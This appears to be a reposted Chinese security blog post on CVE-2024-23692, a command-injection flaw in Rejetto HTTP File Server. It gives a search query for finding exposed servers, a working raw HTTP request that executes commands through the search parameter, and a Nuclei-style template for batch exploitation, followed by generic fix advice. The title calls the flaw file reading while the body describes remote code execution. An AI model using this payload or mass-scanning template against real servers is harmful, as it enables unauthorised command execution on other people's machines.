CVE-2024-23692:Rejetto HTTP文件服务器-任意文件读取-search poc

admin 2024年8月1日14:55:05评论29 views字数 1859阅读6分11秒阅读模式
CVE-2024-23692:Rejetto HTTP文件服务器-任意文件读取-search poc

漏洞简介

Rejetto HTTP文件服务器是一款免费的、跨平台的、基于Java的轻量级HTTP文件服务器软件。它允许用户通过Web浏览器访问和管理文件,支持上传、下载、删除、重命名、创建目录等操作。Rejetto HTTP文件服务器 search接口处存在RCE漏洞(CVE-2024-23692),恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。

》》》影响范围《《《

Rejetto HTTP File Server <= 2.3m

漏洞复现

 

步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~

# 搜索语法app="HFS"

步骤二:发送以下数据包进行命令执行后可在响应正文中获取命令的执行结果!

GET /?n=%0A&cmd=whoami&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: close

CVE-2024-23692:Rejetto HTTP文件服务器-任意文件读取-search poc

批量脚本

 

id: Rejetto-search-RCE
info:  name: Rejetto HTTP文件服务器-RCE-search(CVE-2024-23692)  author: WLF  severity: high  metadata:     FOFA: app="HFS"    Hunter:   variables:  filename: "{{to_lower(rand_base(5))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        GET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: en-US,en;q=0.5        Accept-Encoding: gzip, deflate, br        Connection: close

    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"ESTABLISHED","TIME_WAIT")

CVE-2024-23692:Rejetto HTTP文件服务器-任意文件读取-search poc

修复建议

      首先,是输入验证和过滤,确保用户输入的数据不包含任何恶意命令或特殊字符,使用白名单过滤来限制用户输入的范围。其次,采用参数化查询或使用安全的API来与外部系统进行交互,避免直接拼接用户输入到命令中,以防止命令注入攻击。第三,严格限制应用程序的权限,确保应用程序运行时只能访问和执行必要的系统资源和命令。第四,定期更新和维护系统和组件,及时应用安全补丁,以修复已知的漏洞。最后,加强安全培训和意识提升,培养开发人员和系统管理员对命令执行漏洞的认识和应对能力,以提高系统的整体安全性。通过综合这些措施,可以有效地修复命令执行漏洞,并提高系统对命令注入攻击的防范能力。

 

原文始发于微信公众号(揽月安全团队):CVE-2024-23692:Rejetto HTTP文件服务器-任意文件读取-search

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月1日14:55:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-23692:Rejetto HTTP文件服务器-任意文件读取-search pochttps://cn-sec.com/archives/3021655.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息